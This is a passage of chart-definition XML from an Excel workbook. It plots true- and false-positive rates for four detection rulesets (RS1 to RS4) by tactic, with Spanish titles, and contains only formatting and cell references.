    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart16.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO MENSAJES TP (Manual) - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="385553984"/>
        <c:axId val="594432267"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="385553984"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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594432267"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="594432267"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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385553984"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart17.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO MENSAJES TP (Manual) - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="899531891"/>
        <c:axId val="1256141019"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="899531891"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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1256141019"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1256141019"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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899531891"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart18.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO MENSAJES TP (Manual) - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="1583429837"/>
        <c:axId val="1328591651"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1583429837"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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1328591651"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1328591651"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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583429837"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart19.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO MENSAJES TP (Manual) - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="2073243437"/>
        <c:axId val="1676576288"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="2073243437"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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1676576288"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1676576288"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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2073243437"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart20.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO INSTANCIAS TP (Manual) - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="1202706896"/>
        <c:axId val="2040875419"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1202706896"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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2040875419"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2040875419"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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202706896"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart2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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO INSTANCIAS TP (Manual) - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="1771588336"/>
        <c:axId val="1669136018"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1771588336"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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1669136018"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1669136018"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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771588336"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart2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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO INSTANCIAS TP (Manual) - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="1659039899"/>
        <c:axId val="249297622"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1659039899"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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249297622"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="249297622"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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659039899"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart2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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO INSTANCIAS TP (Manual) - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="840387175"/>
        <c:axId val="289558336"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="840387175"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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289558336"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="289558336"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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840387175"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart24.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>EFECTIVIDAD ALERTAS POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="1" sz="1600">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$EJ$48:$EM$48</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$EJ$65:$EM$65</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1555811605"/>
        <c:axId val="1742351557"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1555811605"/>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1742351557"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1742351557"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="0.5"/>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PORCENTAJE TP RESPECTO A TOTAL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555811605"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart25.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DE FP POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="1" sz="1600">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$EJ$48:$EM$48</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$EJ$66:$EM$66</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1947152620"/>
        <c:axId val="1764678124"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1947152620"/>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1764678124"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1764678124"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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PORCENTAJE TP RESPECTO A TOTAL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947152620"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart26.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual RS1 por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FR$26:$FR$39</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$ET$49:$ET$62</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1565950212"/>
        <c:axId val="2104070729"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1565950212"/>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2104070729"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2104070729"/>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565950212"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart27.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual RS2 por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FS$26:$FS$39</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$ES$49:$ES$62</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1622350184"/>
        <c:axId val="644374638"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1622350184"/>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644374638"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="644374638"/>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622350184"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart28.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual RS3 por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FT$26:$FT$39</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$ER$49:$ER$62</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1724338140"/>
        <c:axId val="1719801721"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1724338140"/>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1719801721"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1719801721"/>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724338140"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart29.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual RS4 por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
